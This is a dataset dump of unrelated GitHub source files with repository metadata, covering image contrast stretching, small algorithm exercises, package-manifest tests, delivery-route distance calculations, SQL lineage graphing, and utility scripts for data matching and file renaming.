values as cutoff. These values should be normalized in the\n range [0.0,1.0].\n \"\"\"\n logger.debug(\"Applying stretch %s with parameters %s\",\n stretch, str(kwargs))\n\n ch_len = len(self.channels)\n if self.mode.endswith(\"A\"):\n ch_len -= 1\n\n if ((isinstance(stretch, tuple) or isinstance(stretch, list))):\n if len(stretch) == 2:\n for i in range(ch_len):\n self.stretch_linear(i, cutoffs=stretch, **kwargs)\n else:\n raise ValueError(\n \"Stretch tuple must have exactly two elements\")\n elif stretch == \"linear\":\n for i in range(ch_len):\n self.stretch_linear(i, **kwargs)\n elif stretch == \"histogram\":\n for i in range(ch_len):\n self.stretch_hist_equalize(i, **kwargs)\n elif stretch in [\"crude\", \"crude-stretch\"]:\n for i in range(ch_len):\n self.crude_stretch(i, **kwargs)\n elif stretch in [\"log\", \"logarithmic\"]:\n for i in range(ch_len):\n self.stretch_logarithmic(i, **kwargs)\n elif stretch == \"no\":\n return\n elif isinstance(stretch, str):\n raise ValueError(\"Stretching method %s not recognized.\" % stretch)\n else:\n raise TypeError(\"Stretch parameter must be a string or a tuple.\")\n\n def invert(self, invert=True):\n \"\"\"Inverts all the channels of a image according to *invert*.\n\n If invert is a tuple or a list, elementwise invertion is performed,\n otherwise all channels are inverted if *invert* is true (default).\n\n Note: 'Inverting' means that black becomes white, and vice-versa, not that the values are negated!\n \"\"\"\n if (isinstance(invert, (tuple, list)) and len(self.channels) != len(invert)):\n raise ValueError(\n \"Number of channels and invert components differ.\")\n\n logger.debug(\"Applying invert with parameters %s\", str(invert))\n if isinstance(invert, (tuple, list)):\n for i, chn in enumerate(self.channels):\n if invert[i]:\n self.channels[i] = 1 - chn\n elif invert:\n for i, chn in enumerate(self.channels):\n self.channels[i] = 1 - chn\n\n def stretch_hist_equalize(self, ch_nb):\n \"\"\"Stretch the current image's colors by performing histogram equalization on channel *ch_nb*.\"\"\"\n logger.info(\"Perform a histogram equalized contrast stretch.\")\n\n if (self.channels[ch_nb].size == np.ma.count_masked(self.channels[ch_nb])):\n logger.warning(\"Nothing to stretch !\")\n return\n\n arr = self.channels[ch_nb]\n\n nwidth = 2048.0\n\n carr = arr.compressed()\n\n cdf = np.arange(0.0, 1.0, 1 / nwidth)\n logger.debug(\"Make histogram bins having equal amount of data, \" +\n \"using numpy percentile function:\")\n bins = np.percentile(carr, list(cdf * 100))\n\n res = np.ma.empty_like(arr)\n res.mask = np.ma.getmaskarray(arr)\n res[~res.mask] = np.interp(carr, bins, cdf)\n\n self.channels[ch_nb] = res\n\n def stretch_logarithmic(self, ch_nb, factor=100.):\n \"\"\"Move data into range [1:factor] and do a normalized logarithmic enhancement.\"\"\"\n logger.debug(\"Perform a logarithmic contrast stretch.\")\n if ((self.channels[ch_nb].size ==\n np.ma.count_masked(self.channels[ch_nb])) or\n (self.channels[ch_nb].min() == self.channels[ch_nb].max())):\n logger.warning(\"Nothing to stretch !\")\n return\n\n crange = (0., 1.0)\n\n arr = self.channels[ch_nb]\n b__ = float(crange[1] - crange[0]) / np.log(factor)\n c__ = float(crange[0])\n slope = (factor - 1.) / float(arr.max() - arr.min())\n arr = 1. + (arr - arr.min()) * slope\n arr = c__ + b__ * np.log(arr)\n self.channels[ch_nb] = arr\n\n def stretch_linear(self, ch_nb, cutoffs=(0.005, 0.005)):\n \"\"\"Stretch linearly the contrast of the current image for a specific channel.\n\n Channel *ch_nb* is the 0-based index.\n Stretching is based on *cutoffs* fractions for left and right trimming.\n \"\"\"\n logger.debug(\"Perform a linear contrast stretch.\")\n\n if ((self.channels[ch_nb].size == np.ma.count_masked(self.channels[ch_nb])) or\n self.channels[ch_nb].min() == self.channels[ch_nb].max()):\n logger.warning(\"Nothing to stretch !\")\n return\n\n arr = self.channels[ch_nb]\n carr = arr.compressed()\n\n logger.debug(\"Calculate the histogram percentiles: \")\n logger.debug(\"Left and right percentiles: \" +\n str(cutoffs[0] * 100) + \" \" + str(cutoffs[1] * 100))\n\n left, right = np.percentile(\n carr, [cutoffs[0] * 100, 100. - cutoffs[1] * 100])\n\n delta_x = (right - left)\n logger.debug(\"Interval: left=%f, right=%f width=%f\",\n left, right, delta_x)\n\n if delta_x > 0.0:\n self.channels[ch_nb] = np.ma.array((arr - left) / delta_x,\n mask=arr.mask)\n else:\n logger.warning(\"Unable to make a contrast stretch!\")\n\n def crude_stretch(self, ch_nb, min_stretch=None, max_stretch=None):\n \"\"\"Perform simple linear stretching (without any cutoff) for a specific channel.\n\n Channel *ch_nb* is the 0-based index. The image is normalized to the [0,1] range.\n \"\"\"\n if min_stretch is None:\n min_stretch = self.channels[ch_nb].min()\n if max_stretch is None:\n max_stretch = self.channels[ch_nb].max()\n\n if isinstance(min_stretch, (list, tuple)):\n min_stretch = min_stretch[ch_nb]\n if isinstance(max_stretch, (list, tuple)):\n max_stretch = max_stretch[ch_nb]\n\n if ((not self.channels[ch_nb].mask.all()) and abs(max_stretch - min_stretch) > 0):\n stretched = self.channels[ch_nb].data.astype(float)\n stretched -= min_stretch\n stretched /= max_stretch - min_stretch\n self.channels[ch_nb] = np.ma.array(stretched,\n mask=self.channels[ch_nb].mask,\n copy=False)\n else:\n logger.warning(\"Nothing to stretch !\")\n\n def merge(self, img):\n \"\"\"Use provided image as a background where the current image has missing data.\"\"\"\n if self.is_empty():\n raise ValueError(\"Cannot merge an empty image.\")\n\n if self.mode != img.mode:\n raise ValueError(\"Cannot merge image of different modes.\")\n\n selfmask = self.channels[0].mask\n for chn in self.channels[1:]:\n selfmask = np.ma.mask_or(selfmask, chn.mask)\n\n for i in range(len(self.channels)):\n self.channels[i] = np.ma.where(selfmask,\n img.channels[i],\n self.channels[i])\n self.channels[i].mask = np.logical_and(selfmask,\n img.channels[i].mask)\n\n def colorize(self, colormap):\n \"\"\"Colorize the current image using *colormap*.\n\n Works only on\"L\" or \"LA\" images.\n \"\"\"\n if self.mode not in (\"L\", \"LA\"):\n raise ValueError(\"Image should be grayscale to colorize\")\n if self.mode == \"LA\":\n alpha = self.channels[1]\n else:\n alpha = None\n self.channels = list(colormap.colorize(self.channels[0]))\n if alpha is not None:\n self.channels.append(alpha)\n self.mode = \"RGBA\"\n else:\n self.mode = \"RGB\"\n\n def palettize(self, colormap):\n \"\"\"Palettize the current image using *colormap*.\n\n Works only on\"L\" or \"LA\" images.\n \"\"\"\n if self.mode not in (\"L\", \"LA\"):\n raise ValueError(\"Image should be grayscale to colorize\")\n self.channels[0], self.palette = colormap.palettize(self.channels[0])\n if self.mode == \"L\":\n self.mode = \"P\"\n else:\n self.mode = \"PA\"\n\n def blend(self, other):\n \"\"\"Alpha blend *other* on top of the current image.\"\"\"\n if self.mode != \"RGBA\" or other.mode != \"RGBA\":\n raise ValueError(\"Images must be in RGBA\")\n src = other\n dst = self\n outa = src.channels[3] + dst.channels[3] * (1 - src.channels[3])\n for i in range(3):\n dst.channels[i] = (src.channels[i] * src.channels[3] +\n dst.channels[i] * dst.channels[3] *\n (1 - src.channels[3])) / outa\n dst.channels[i][outa == 0] = 0\n dst.channels[3] = outa\n\n def _repr_png_(self):\n import io\n b = io.BytesIO()\n self.save(b, fformat=\"png\")\n return b.getvalue()\n\n\ndef _areinstances(the_list, types):\n \"\"\"Check if all the elements of the list are of given type.\"\"\"\n return all([isinstance(item, types) for item in the_list])\n\n\ndef _is_pair(item):\n \"\"\"Check if an item is a pair (tuple of size 2).\"\"\"\n return (isinstance(item, (list, tuple, set)) and\n len(item) == 2 and\n not isinstance(item[0], (list, tuple, set)) and\n not isinstance(item[1], (list, tuple, set)))\n\n\ndef _is_list_of_pairs(the_list):\n \"\"\"Check if a list contains only pairs.\"\"\"\n return all([_is_pair(item) for item in the_list])\n\n\ndef ycbcr2rgb(y__, cb_, cr_):\n \"\"\"Convert the three YCbCr channels to RGB channels.\"\"\"\n kb_ = 0.114\n kr_ = 0.299\n\n r__ = 2 * cr_ / (1 - kr_) + y__\n b__ = 2 * cb_ / (1 - kb_) + y__\n g__ = (y__ - kr_ * r__ - kb_ * b__) / (1 - kr_ - kb_)\n\n return r__, g__, b__\n\n\ndef rgb2ycbcr(r__, g__, b__):\n \"\"\"Convert the three RGB channels to YCbCr.\"\"\"\n kb_ = 0.114\n kr_ = 0.299\n\n y__ = kr_ * r__ + (1 - kr_ - kb_) * g__ + kb_ * b__\n cb_ = 1. / (2 * (1 - kb_)) * (b__ - y__)\n cr_ = 1. / (2 * (1 - kr_)) * (r__ - y__)\n\n return y__, cb_, cr_\n","repo_name":"pytroll/trollimage","sub_path":"trollimage/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":41810,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"94"} +{"seq_id":"12069663915","text":"a = int(input())\n\nwhile a!=0:\n check = 0\n arr = [True] * (2*a+1)\n for i in range(2,2*a+1):\n if arr[i]:\n if i > a: check += 1\n for j in range(2*i,2*a+1,i):\n arr[j] = False\n\n print(check)\n a = int(input())","repo_name":"KimSeungHyun1217/Algorithm","sub_path":"baekjoon/4948/베르트랑 공준.py","file_name":"베르트랑 공준.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"18113125521","text":"from django.shortcuts import render\n\n# Create your views here.\ndef main(request):\n output = {}\n if request.method == \"POST\":\n try:\n num = int(request.POST['num'])\n if num % 5 == 0 and num % 3 == 0:\n answer = \"FizzBuzz\"\n elif num % 5 == 0:\n answer = \"Buzz\"\n elif num % 3 == 0:\n answer = \"Fizz\"\n else:\n answer = num\n except:\n answer = \"not a valid input\"\n output['answer'] = answer\n return render(request, 'fizzbuzz/prompt.html', output)\n","repo_name":"reddress/heitorpyany","sub_path":"fizzbuzz/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"7335906828","text":"import os.path\n\nfrom packagedcode import pubspec\n\nfrom packages_test_utils import check_result_equals_expected_json\nfrom packages_test_utils import build_tests\nfrom packages_test_utils import PackageTester\n\ntest_data_dir = os.path.join(os.path.dirname(__file__), 'data')\n\n\nclass TestPubspecDatadriven(PackageTester):\n test_data_dir = test_data_dir\n\n def test_pubspec_lock_is_manifest(self):\n test_file = self.get_test_loc('pubspec/locks/dart-pubspec.lock')\n assert pubspec.PubspecLock.is_manifest(test_file)\n\n def test_pubspec_yaml_is_manifest(self):\n test_file = self.get_test_loc('pubspec/specs/authors-pubspec.yaml')\n assert pubspec.PubspecYaml.is_manifest(test_file)\n\n def test_parse_lock(self):\n test_loc = self.get_test_loc('pubspec/mini-pubspec.lock')\n expected_loc = self.get_test_loc('pubspec/mini-pubspec.lock-expected.json', must_exist=False)\n package_manifests = pubspec.PubspecLock.recognize(test_loc)\n self.check_packages(package_manifests, expected_loc, regen=False)\n\n\ndef pub_tester(location,):\n manifests = []\n for package_manifest in pubspec.PubspecYaml.recognize(location):\n manifests.append(package_manifest.to_dict())\n return manifests\n\n\ndef lock_tester(location,):\n manifests = []\n for package_manifest in pubspec.PubspecLock.recognize(location):\n manifests.append(package_manifest.to_dict())\n return manifests\n\n\nbuild_tests(\n test_dir=os.path.join(test_data_dir, 'pubspec/specs'),\n clazz=TestPubspecDatadriven,\n test_method_prefix='test_pubspec_yaml',\n tested_function=pub_tester,\n test_file_suffix='pubspec.yaml',\n regen=False,\n)\n\nbuild_tests(\n test_dir=os.path.join(test_data_dir, 'pubspec/locks'),\n clazz=TestPubspecDatadriven,\n test_method_prefix='test_pubspec_lock',\n tested_function=lock_tester,\n test_file_suffix='pubspec.lock',\n regen=False,\n)\n","repo_name":"maynaS/scancode-toolkit","sub_path":"tests/packagedcode/test_pubspec.py","file_name":"test_pubspec.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"94"} +{"seq_id":"36835019927","text":"#James Wingert #001424955\r\nimport csv\r\nimport datetime\r\n\r\n# Read in csv file that is the mapping of distances between locations\r\nwith open('WGUDistance.csv') as csvfile:\r\n readCSV = csv.reader(csvfile, delimiter=',')\r\n readCSV = list(readCSV)\r\n\r\n# Read in csv file that is the names of all possible delivery locations\r\nwith open('WGUDistanceInfo.csv') as csv_name_file:\r\n name_readCSV = csv.reader(csv_name_file, delimiter=',')\r\n name_readCSV = list(name_readCSV)\r\n\r\n # Function finds the distance by comparing row and column at the point in which they meet\r\n # Space-time complexity is O(1)\r\n def check_distance(row_value, column_value, sum_of_distance):\r\n distance = readCSV[row_value][column_value]\r\n if distance == '':\r\n distance = readCSV[column_value][row_value]\r\n\r\n sum_of_distance += float(distance)\r\n return sum_of_distance\r\n\r\n # this function is very similar to the function above but returns a current distance\r\n # Space-time complexity is O(1)\r\n def check_current_distance(row_value, column_value):\r\n distance = readCSV[row_value][column_value]\r\n if distance == '':\r\n distance = readCSV[column_value][row_value]\r\n return float(distance)\r\n # this is the time that the first truck leaves the hub\r\n first_time_list = ['8:00:00']\r\n second_time_list = ['9:10:00']\r\n third_time_list = ['11:00:00']\r\n\r\n # The default MPH is 18. Dividing distance / 18 it creates total time. Divmod is common to help create time\r\n # structure, this string is then used with timedelta\r\n #\r\n # that object is then added to sum which represents total distance for a particular truck\r\n # runtime of function is O(N)\r\n def check_time_first_truck(distance):\r\n new_time = distance / 18\r\n distance_in_minutes = '{0:02.0f}:{1:02.0f}'.format(*divmod(new_time * 60, 60))\r\n final_time = distance_in_minutes + ':00'\r\n first_time_list.append(final_time)\r\n sum = datetime.timedelta()\r\n for i in first_time_list:\r\n (h, m, s) = i.split(':')\r\n d = datetime.timedelta(hours=int(h), minutes=int(m), seconds=int(s))\r\n sum += d\r\n return sum\r\n # Repeated function for second truck\r\n def check_time_second_truck(distance):\r\n new_time = distance / 18\r\n distance_in_minutes = '{0:02.0f}:{1:02.0f}'.format(*divmod(new_time * 60, 60))\r\n final_time = distance_in_minutes + ':00'\r\n second_time_list.append(final_time)\r\n sum = datetime.timedelta()\r\n for i in second_time_list:\r\n (h, m, s) = i.split(':')\r\n d = datetime.timedelta(hours=int(h), minutes=int(m), seconds=int(s))\r\n sum += d\r\n return sum\r\n # Repeated function for the third truck\r\n def check_time_third_truck(distance):\r\n new_time = distance / 18\r\n distance_in_minutes = '{0:02.0f}:{1:02.0f}'.format(*divmod(new_time * 60, 60))\r\n final_time = distance_in_minutes + ':00'\r\n third_time_list.append(final_time)\r\n sum = datetime.timedelta()\r\n for i in third_time_list:\r\n (h, m, s) = i.split(':')\r\n d = datetime.timedelta(hours=int(h), minutes=int(m), seconds=int(s))\r\n sum += d\r\n return sum\r\n\r\n # this function returns the time objects to use in the Packages.py file\r\n # Space-time complexity is O(1)\r\n def check_address():\r\n return name_readCSV\r\n\r\n\r\n # The following is my automated optimizing sorting algorithm utilizing a greedy approach. There are 3 parameters:\r\n # 1. List of not-yet-optimized packages on the truck\r\n # 2. Truck number\r\n # 3. Current location which is constantly updated once the truck is moving.\r\n # The first if statement sets the base case to end the recursion if the list = 0\r\n # By starting with the lowest value of 20, it constantly checks the current distance against every other possible\r\n # location. If a lower value is found, it continues to iterate through the list to match that new lowest value. Once\r\n # the list is completely iterated through, it then adds the package object and associated index to the new lists.\r\n # The lowest values are taken out of the default list, truck_distance_list, and added to the respective\r\n # trucks optimization list. The function can then be called recursively and update current location.\r\n # The function call will end once the list is empty.\r\n\r\n # The 2 for loops and the constant look up functions cause this to have:\r\n # Space-time complexity of O(N^2).\r\n\r\n # these lists represent the sorted trucks that are put in order of efficiency in the function below\r\n truck_one_optimized = []\r\n truck_one_optimized_index_list = []\r\n truck_two_optimized = []\r\n truck_two_optimized_index_list = []\r\n truck_three_optimized = []\r\n truck_three_optimized_index_list = []\r\n\r\n\r\n def calculate_shortest_distance(truck_distance_list, truck_number, current_location): # section 1\r\n if len(truck_distance_list) == 0: # section 2\r\n return truck_distance_list\r\n else: #\r\n try:\r\n lowest_value = 20.0\r\n new_location = 0\r\n for index in truck_distance_list:\r\n if check_current_distance(current_location, int(index[1])) <= lowest_value:\r\n lowest_value = check_current_distance(current_location, int(index[1])) # section 3\r\n new_location = int(index[1])\r\n for index in truck_distance_list: # section 4\r\n if check_current_distance(current_location, int(index[1])) == lowest_value:\r\n if truck_number == 1:\r\n truck_one_optimized.append(index)\r\n truck_one_optimized_index_list.append(index[1])\r\n pop_value = truck_distance_list.index(index)\r\n truck_distance_list.pop(pop_value)\r\n current_location = new_location\r\n calculate_shortest_distance(truck_distance_list, 1, current_location)\r\n elif truck_number == 2:\r\n truck_two_optimized.append(index)\r\n truck_two_optimized_index_list.append(index[1])\r\n pop_value = truck_distance_list.index(index)\r\n truck_distance_list.pop(pop_value)\r\n current_location = new_location\r\n calculate_shortest_distance(truck_distance_list, 2, current_location)\r\n elif truck_number == 3:\r\n truck_three_optimized.append(index)\r\n truck_three_optimized_index_list.append(index[1])\r\n pop_value = truck_distance_list.index(index)\r\n truck_distance_list.pop(pop_value)\r\n current_location = new_location\r\n calculate_shortest_distance(truck_distance_list, 3, current_location)\r\n except IndexError:\r\n pass\r\n\r\n truck_one_optimized_index_list.insert(0, '0')\r\n\r\n # Space-time complexity is O(1)\r\n def truck_one_optimized_index():\r\n return truck_one_optimized_index_list\r\n\r\n # Space-time complexity is O(1)\r\n def truck_one_optimized_list():\r\n return truck_one_optimized\r\n\r\n truck_two_optimized_index_list.insert(0, '0')\r\n\r\n # Space-time complexity is O(1)\r\n def truck_two_optimized_index():\r\n return truck_two_optimized_index_list\r\n\r\n # Space-time complexity is O(1)\r\n def truck_two_optimized_list():\r\n return truck_two_optimized\r\n\r\n truck_three_optimized_index_list.insert(0, '0')\r\n\r\n # Space-time complexity is O(1)\r\n def truck_three_optimized_index():\r\n return truck_three_optimized_index_list\r\n\r\n # Space-time complexity is O(1)\r\n def truck_three_optimized_list():\r\n return truck_three_optimized\r\n","repo_name":"JamesWingert/Vehicle-Routing-Program","sub_path":"JamesWingertVRP/Distances.py","file_name":"Distances.py","file_ext":"py","file_size_in_byte":8092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"5291840469","text":"from transformers import XLNetTokenizer, XLNetForMultipleChoice\nimport torch\n\n\nclass Xlnet():\n def __init__(self, config):\n model_path = config['model_path']\n\n self.tokenizer = XLNetTokenizer.from_pretrained(model_path)\n self.model = XLNetForMultipleChoice.from_pretrained(model_path)\n\n def predict(self, choices):\n input_ids = torch.tensor([self.tokenizer.encode(s) for s in choices]).unsqueeze(0) # Batch size 1, 2 choices\n labels = torch.tensor(3).unsqueeze(0) # Batch size 1\n\n outputs = self.model(input_ids, labels=labels)\n loss, classification_scores = outputs[:3]\n\n return classification_scores","repo_name":"vivemeno/ARC_NLP_Enhancement","sub_path":"xlnet.py","file_name":"xlnet.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"9691504861","text":"from sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import create_engine\n\n\nflask_backend_Base = declarative_base()\nhacker_news_Base = declarative_base()\n\n\ndef create_session(db_uri):\n engine = create_engine(\n db_uri\n )\n session = scoped_session(\n sessionmaker(\n autocommit=False,\n autoflush=False,\n bind=engine,\n )\n )\n return session\n","repo_name":"BorodaUA/flask_backend","sub_path":"db/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"73620518069","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jan 13 22:01:10 2022\r\n\r\n@author: ryanz\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n# df1 = pd.read_csv(\"C:/Users/ryanz/Desktop/real_result_yes3.csv\")\r\n\r\n# addlist = df1['distance'].unique()\r\n# dsf = []\r\n# for m in addlist:\r\n# df_ch = df1[df1['distance'] == m]\r\n# if len(df_ch) >= 2:\r\n# dsf.append(df_ch)\r\n\r\n# result_yes = pd.concat(dsf)\r\n# result_yes.to_csv(\"C:/Users/ryanz/Desktop/3.csv\")\r\n# ###########################################################################################\r\n# data1 = pd.read_csv(\"C:/Users/ryanz/Desktop/real_result_yes3.csv\")\r\n# data2 = pd.read_csv(\"C:/Users/ryanz/Desktop/3.csv\")\r\n# df_mat = data1.merge(data2,left_on='FIDALCO',right_on = 'SAMEDIS', how= 'left')\r\n# df_mat.to_csv(\"C:/Users/ryanz/Desktop/real_result_yes4.csv\")\r\n###########################################################################################\r\nsure1 = pd.read_csv(\"C:/Users/ryanz/Desktop/real_result_yes9.csv\")\r\nsurelist = sure1['distance'].unique()\r\n# dsfs = []\r\nfor m in surelist:\r\n df_sure = sure1[sure1['distance'] == m]\r\n df_sure.reset_index(drop = True, inplace = True)\r\n if len(df_sure) >= 2:\r\n if pd.isna(df_sure['lis'][0]) == False:\r\n for x in range(len(df_sure)):\r\n index = sure1[sure1.FIDALCO == df_sure['FIDALCO'][x]].index.tolist()[0]\r\n sure1[\"lis\"][index] = sure1['FIDALCO'][index]\r\nsure1.to_csv(\"C:/Users/ryanz/Desktop/real_result_yes10.csv\")\r\n\r\n# match safegraph data\r\ndf1 = pd.read_csv(\"C:/Users/ryanz/Desktop/2022-01-07-21-core_poi4.csv\")\r\ndf2 = pd.read_csv(\"C:/Users/ryanz/Desktop/yes3.csv\") \r\ndf_mat = df1.merge(df2,left_on='FIDSAFE',right_on = 'FIDSAFE', how= 'left')\r\ndf_mat.to_csv(\"C:/Users/ryanz/Desktop/2022-01-07-21-core_poi5.csv\")\r\n\r\n# match alcohol data\r\ndf1 = pd.read_csv(\"C:/Users/ryanz/Desktop/NY alcohol_0107_all_5_yesco.csv\")\r\ndf2 = pd.read_csv(\"C:/Users/ryanz/Desktop/no3.csv\") \r\ndf_mat = df1.merge(df2,left_on='FIDALCO',right_on = 'FIDALCO', how= 'left')\r\ndf_mat.to_csv(\"C:/Users/ryanz/Desktop/NY alcohol_0107_all_11_yesco.csv\")","repo_name":"ryan-zhenqi-zhou/Data-Quality-Assessment","sub_path":"Code/0205 Find same distance.py","file_name":"0205 Find same distance.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"27187889021","text":"\"\"\"Utils to get column-level lineage graph of SQL query; WIP.\"\"\"\nimport json\nimport random\nfrom hashlib import md5\nfrom typing import Dict, List, Optional, Tuple, Union\n\nimport networkx as nx\n\nfrom matplotlib import pyplot as plt\n\n\ndef find_col(\n query: Dict, col_name: str\n) -> Optional[Tuple[Dict, Union[str, List[Union[str, Dict]]]]]:\n \"\"\"Get matching colum from query\n\n Arguments:\n query: moz-sql-parser query with 'select' key and 'from' key\n col_name: col we want to get lineage info from\n\n Returns:\n lineage info of column.\n \"\"\"\n final_select = query[\"select\"]\n if type(final_select) == list:\n matching_cols = [\n col for col in query[\"select\"] if col.get(\"name\", col[\"value\"]) == col_name\n ]\n if len(matching_cols):\n return (matching_cols[0], query[\"from\"])\n elif type(final_select) == dict:\n # handle '*'\n if \"*\" in str(final_select):\n return ({\"value\": col_name}, query[\"from\"])\n return None\n\n\ndef slice_ctes(query: Dict, cte_name: str):\n return {w[\"name\"]: w[\"value\"] for w in query[\"with\"]}.get(cte_name)\n\n\nclass LineagePoint:\n def __init__(self, x, y, display_name=None):\n self.x: Dict = x\n self.y: Union[str, Dict, List[Union[str, Dict]]] = y\n self.display_name = display_name\n\n @property\n def col_name(self):\n # if there is a rename, get the renamed value\n return self.x.get(\"name\", self.x[\"value\"])\n\n @property\n def ancestor_col_name(self):\n if type(self.x[\"value\"]) == str:\n # not an aggregate\n # print('~'*31)\n # print(self.x[\"value\"])\n # print('~'*31)\n return self.x[\"value\"]\n else:\n # print('/'*31)\n # print(self.x['value'].values())\n token = next(iter(self.x[\"value\"].values()))\n # if there is an aggregation, get the ancestor column\n # the key could be anything\n # TODO: handle complex aggregations, e.g. for idf_entities.idf\n # if isinstance(token, list):\n # tokens = flatten(token)\n # tok = {md5(json.dumps(k).encode(\"utf-8\")).hexdigest(): v for k,v in tokens.items()}\n # # print('tokens')\n # # print(tokens,tok)\n # return next(iter(tok.values()))\n # print('\\\\'*31)\n return token\n\n @staticmethod\n def get_table_name(tbl):\n if type(tbl) == list:\n # more than 1 table\n return md5(json.dumps(tbl).encode(\"utf-8\")).hexdigest()\n elif type(tbl) == str:\n return tbl\n elif type(tbl) == dict:\n # TODO: check when JOIN + rename\n # TODO: check for left, inner and right JOIN\n return tbl.get(\"join\") or tbl.get(\"value\")\n\n @property\n def table_name(self):\n return self.display_name or self.get_table_name(self.y)\n\n def __repr__(self):\n # Important: ancestor_col_name instead of col_name because col_name might be a rename\n return f\"{self.table_name}.{self.ancestor_col_name}\"\n\nfrom functools import reduce\n\n\ndef _reducer(items, key, val, pref):\n if isinstance(val, dict):\n return {**items, **flatten(val, pref = f'{pref}{key}')}\n elif isinstance(val, list): \n return {**items, **flatten(dict(enumerate(val)), pref = f'{pref}{key}')}\n elif isinstance(val, str): \n return {**items, f'{pref}{key}': val}\n else:\n return {**items}\n\n\ndef flatten(d, pref=''):\n if isinstance(d, list):\n d = dict(enumerate(d))\n return(\n reduce(\n lambda new_d, kv: _reducer(new_d, *kv, pref), \n d.items(), \n {}\n )\n )\n\n\ndef process_lineage_point(lp: LineagePoint, query: Dict) -> Optional[List[LineagePoint]]:\n # Handle cases where the column is computed with custom logic\n if type(lp.ancestor_col_name) != str:\n print('AQUIII!')\n #return None\n cols = flatten(lp.ancestor_col_name).values()\n new_lp = [ LineagePoint(*({'value': col}, query['from'])) for col in cols]\n return new_lp\n \n\n if type(lp.y) == list:\n # flatten joins by considering each part of join as potential provenance for column\n new_lps = [LineagePoint(lp.x, tbl) for tbl in lp.y]\n return new_lps\n else:\n # TODO: use name_for_upstream instead of name_for_downstream, e.g. for kg_coaches.coach_id\n q = slice_ctes(query, lp.table_name)\n if not q:\n # no CTE with the table_name was found\n return []\n found_col = find_col(query=q, col_name=lp.ancestor_col_name)\n if not found_col:\n #  CTE isn't related to column\n # remove dead branch\n return None\n new_lp = LineagePoint(*found_col)\n return [new_lp]\n\n\ndef draw_multi_graph(G: nx.Graph):\n return nx.drawing.nx_pydot.to_pydot(G)\n\n\n\ndef draw_graph(G: nx.Graph) -> plt.Figure:\n fig, ax = plt.subplots(figsize=(15, 7))\n \n\n if len(G):\n pos = nx.spring_layout(G)\n \n # nodes\n nx.draw_networkx_nodes(G, pos,\n node_size=100,\n node_color=\"orange\")\n\n #edges \n nx.draw_networkx_edges(\n G, pos,\n width=1,alpha=0.9,edge_color='black',\n arrowsize=20,\n ax=ax)\n #edge-labels\n formatted_edge_labels = {(u, v): d for u, v, d in G.edges(data=True)}\n nx.draw_networkx_edge_labels(G,pos,edge_labels=formatted_edge_labels,font_color='red')\n\n # labels\n nodenames = {n:'\\n'.join(n.split('.')) for n in G.nodes()}\n\n nx.draw_networkx_labels(\n G,pos,font_size=8,font_family='sans-serif'\n ,verticalalignment='bottom'\n ,labels=nodenames\n )\n plt.axis('off')\n plt.tight_layout()\n plt.subplots_adjust(left=0.1)\n\n return fig\n","repo_name":"dennysreg/sql-lineage","sub_path":"src/dbt_metadata_utils/column_level.py","file_name":"column_level.py","file_ext":"py","file_size_in_byte":5976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"26245342607","text":"def work_fn():\n print('working')\n\n # for i in range(100):\n # print('this is running', i)\n # sleep(0.5)\n # sys.stdout.flush()\n\n\nif __name__ == '__main__':\n import jaynes\n\n # from dmc_gen.train import train\n for i in range(60):\n jaynes.config(\"vision\", launch=dict(ip=f\"visiongpu{i:02d}\"))\n jaynes.run(work_fn)\n\n # for i in range(1):\n # jaynes.config(\"vision-gpu\")\n # jaynes.run(work_fn)\n\n # for i in range(60):\n # jaynes.config(\"visiongpu\", launch=dict(ip=f\"visiongpu{i:02d}\"),\n # runner=dict(pypath=\"$HOME/jaynes-debug\", work_dir=\"$HOME/jaynes-debug\"), mounts=[], )\n # jaynes.run(work_fn, aug_data_prefix=\"/afs/csail.mit.edu/u/g/geyang/mit/dmc_gen/custom_vendor/data\")\n\n # jaynes.config(\"supercloud\", runner=dict(n_cpu=1, n_gpu=0))\n # jaynes.run(train_fn)\n jaynes.listen()\n\n# highly non-rectangular\n# custom cuda kernels\n# how do fully general tensor product\n#\n# Does it make it harder to optimize. Higher order\n","repo_name":"geyang/dmc_gen","sub_path":"dmc_gen_analysis/__infra/map_on_cluster.py","file_name":"map_on_cluster.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"9809216696","text":"# -*- coding: UTF-8 -*-\n'''\n Create by 谢昊璋 on 2021/4/26 22:03 \n'''\n# coding = utf-8\nimport os\n\n# 文件路径\n# path = \"D:/RM2021/test/\"\npath = \"D:/RM2021/1/\"\n\n# 标号起点\ncount = 1\n\n# 获取该目录下所有文件,存入列表中\nfileList = os.listdir(path)\n\nn = 0\nfor i in fileList:\n\n old_name = path + fileList[n]\n new_name= path + \"Img\" + str(count) + \".jpg\"\n\n print(i)\n\n os.rename(old_name, new_name) # 用os模块中的rename方法对文件改名\n print(i, '======>', new_name)\n n += 1\n count += 